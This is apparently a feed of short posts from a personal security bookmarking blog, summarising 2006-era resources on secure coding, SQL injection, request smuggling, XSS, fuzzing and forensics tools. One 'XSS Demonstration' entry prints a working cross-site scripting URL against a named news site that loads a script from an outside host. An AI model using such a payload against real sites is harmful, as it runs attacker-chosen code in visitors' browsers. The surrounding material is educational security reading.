- Dumpster Dive -
A personal bookmarking site dedicated to network security, open source, linux and programming.
Author: Jayesh (http://www.blogger.com/profile/07732221430964853422)
Feed updated: 2024-03-08

CERT Secure Coding Standards
Posted: 2007-01-31
From www.cert.org/secure-coding: As part of the CERT Secure Coding Initiative, the Computer Emergency Response Team (CERT) has deployed a new collaborative web site, SecureCoding, dedicated to developing secure coding standards for various programming languages. CERT's initial efforts are focused on the development of secure coding practices for the C and C++ programming languages. Rules and

CWE - Common Weakness Enumeration
Posted: 2006-10-23
From cwe.mitre.org: CWE is a community-developed dictionary of common software weaknesses targeted to developers and security practitioners. "...CWE is a community-developed formal list of common software weaknesses. It serves as a common language for describing software security weaknesses, a standard measuring stick for software security tools targeting these vulnerabilities, and as a baseline

Build Security In - BSI
Posted: 2006-10-23
From buildsecurityin.us-cert.gov: Build Security In (BSI) is a project of the Strategic Initiatives Branch of the National Cyber Security Division (NCSD) of the Department of Homeland Security (DHS). The Software Engineering Institute (SEI) was engaged by the NCSD to provide support in the Process and Technology focus areas of this initiative.
The SEI team and other contributors develop and

An Illustrated Guide to IPsec
Posted: 2006-10-23
From Steve Friedl's Unixwiz.net Tech Tips, unixwiz.net: "...IPsec is a suite of protocols for securing network connections, but the details and many variations quickly become overwhelming. This is particularly the case when trying to interoperate between disparate systems, causing more than one engineer to just mindlessly turn the knobs when attempting to bring up a new connection. This Tech Tip

Netdude - a Framework for Packet Trace Manipulation
Posted: 2006-10-23
Netdude is a framework for inspection, visualization, and modification of tcpdump packet trace files. Its modular design allows users to interact with the framework at different abstraction levels: a low-level trace navigation wrapper for libpcap called libpcapnav, a high-level API with convenient types for performing common packet manipulation tasks in libnetdude, and a GUI application that

SQL Injection Walkthrough
Posted: 2006-10-23
From SecuriTeam.com: SQL Injection is a trick to inject an SQL query/command as an input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance when a user logs in: the web page takes the user name and password and makes an SQL query to the database to check if the user has a valid name and password.
With SQL Injection, it is possible for us to send

HTTP Request Smuggling attack
Posted: 2006-10-23
From Prashant Gawade, Palisade Magazine: "...HTTP Request Smuggling (HRS) attack is the result of a device failure to properly handle deformed inbound HTTP requests. HRS works by taking benefit of the discrepancies in HTTP request parsing when one or more HTTP devices are in the data flow between the user and the web server. HTTP Request smuggling leads to various attacks like web cache poisoning

vTun - Virtual Tunnels
Posted: 2006-10-23
From vtun.sourceforge.net: VTun is the easiest way to create Virtual Tunnels over TCP/IP networks with traffic shaping, compression, and encryption. It supports IP, PPP, SLIP, Ethernet and other tunnel types. VTun is easily and highly configurable and can be used for various network tasks like VPN, Mobile IP, etc.

Reading C type declarations
Posted: 2006-10-23
From Steve Friedl's Unixwiz.net Tech Tips, unixwiz.net: "...
Even relatively new C programmers have no trouble reading simple C declarations such as

    int foo[5];     // foo is an array of 5 ints
    char *foo;      // foo is a pointer to char
    double foo();   // foo is a function returning a double

but as the declarations get a bit more involved, it's more difficult to know exactly

Your Field Guide To Designing Security Into Networking Protocols
Posted: 2006-10-22
From Mark Pustilnik & Andrew Roths, MSDN Magazine: Designing a secure protocol is a treacherous task. This article outlines some of the most common pitfalls that await you, but there are many others. Perhaps the best insurance against making mistakes is having your design reviewed by knowledgeable peers, documenting your security guarantees as well as your thought process, and making sure that no

One-way Web Hacking
Posted: 2006-10-22
From Saumil Shah, net-square.com: One-way web hacking is a technique which relies purely on HTTP traffic to attack and penetrate web servers and application servers. This technique was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and

DHCPing - BOOTP/DHCP audit tool
Posted: 2006-10-22
From Gregory Duchemin, dhcping.openwall.net: DHCPing is a lightweight and featureful security tool written in PERL and designed to test the security of various flavors of DHCP implementations around.
DHCPing also offers several exploits for the latest vulnerabilities in DHCP implementation of various vendors along with a set of generic attacks. A list of the vulnerabilities that DHCPing has

THC Nokia Phone-Lock Reset
Posted: 2006-09-13
The Hacker's Choice has released a tool, thc-nokia-unlock, that exploits a design flaw in Nokia mobile phones to remove the phone-lock. The Phone Lock feature is designed to disable the key pad, bluetooth and the USB port. This makes it impossible to access the data stored on the device without knowing the correct code. This unlock tool makes use of some undocumented features of the Symbian OS which

Nmap Scripting Engine
Posted: 2006-09-13
From Buanzo's Consulting blog: The Nmap-dev mailing list has an announcement about the final release of the Nmap Scripting Engine. A sample script written by Buanzo for detection of SMTP Open Relay is available here.

PaiMei reverse engineering framework
Posted: 2006-09-05
From pedram.redhive.com: PaiMei is a reverse engineering framework consisting of multiple extensible components.
The framework can essentially be thought of as a reverse engineer's swiss army knife and has already been proven effective for a wide range of both static and dynamic tasks such as fuzzer assistance, code coverage tracking, data flow tracking and more. More tools from this

Process Stalker
Posted: 2006-09-05
From pedram.redhive.com: Process Stalking is a term coined to describe the combined process of run-time profiling, state mapping and tracing. Consisting of a series of tools and scripts, the goal of a successful stalk is to provide the reverse engineer with an intuitive interface to run-time block-level trace data. The Process Stalking suite is broken into three main components; an IDA Pro plug-in, a

eEye Research Tools
Posted: 2006-09-05
A lot of previously unreleased research tools are now made available at the eEye research website, research.eEye.com.

AxMan ActiveX fuzzing engine
Posted: 2006-09-05
From metasploit.com: AxMan is a web-based ActiveX fuzzing engine. The goal of AxMan is to discover vulnerabilities in COM objects exposed through Internet Explorer. Since AxMan is web-based, any security changes in the browser will also affect the results of the fuzzing process. This allows for a much more realistic test than other COM-based assessment tools.
AxMan is designed to be used with

AttackAPI
Posted: 2006-09-05
From gnucitizen.org: AttackAPI provides a simple and intuitive web programmable interface for composing attack vectors with JavaScript and other client (and server) related technologies. The current release supports several browser based attacking techniques and a simple but powerful JavaScript console. Other interesting projects from gnucitizen.org: i) JavaScript Shell ii) JavaScript

Demystifying Cross Site Scripting Attacks
Posted: 2006-09-05
From David Kierznowski: Awaking the Sleeping Giant v1.0. Demystifying Cross Site Scripting Attacks. Author: David Kierznowski. This paper attempts to demystify and categorise current XSS entry nodes, attack capabilities and trends. XSS attacks are gaining popularity quickly. There are loads of vulnerabilities waiting to be found. It can be simple and difficult to prevent.
It can propagate around the

How to get linked from Slashdot
Posted: 2006-09-05
From Jeremiah Grossman's blog: A five step process, making use of Slashdot's PreviewStory feature, to create URLs that link anywhere and say anything.

Live View
Posted: 2006-09-05
From LiveView site: "...Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. This allows the forensic examiner to "boot up" the image or disk and gain an interactive, user-level perspective of the environment, all without modifying the underlying image or disk. Because all changes made to the disk are written

WildPackets OmniPeek Personal
Posted: 2006-09-05
"...OmniPeek Personal, the first commercially developed Expert network analyzer available free for personal use.
OmniPeek Personal gives individual users the chance to experience the power and extensibility of WildPackets’ award-winning network analysis technology at no cost. OmniPeek Personal offers:
* Best-in-class wired and wireless analysis in one application
* Intuitive real-time graphics

XSS Demonstration
Posted: 2006-09-05
SecurityLab posted a demonstration of Cross Site Scripting (XSS) vulnerabilities in CBS News and the BBC websites. Looks like BBC has now fixed this flaw in their website but CBS News is still vulnerable. The URL they provide for CBS is: http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!-- The

Secure Surfing at the Coffee Shop
Posted: 2006-08-19
From Kyle Haugsness, SANS Handler's Diary: This tip is how to use SSH port forwarding to browse the web at your favorite coffee shop (or hacker conference).
1) Set up a machine on your home network. If you don't have a static IP address, then use dynamic DNS.
2) On this machine set up squid (http://www.squid-cache.org/) and bind it only to localhost. Do this with the "http_port 127.0.0.1:3128" line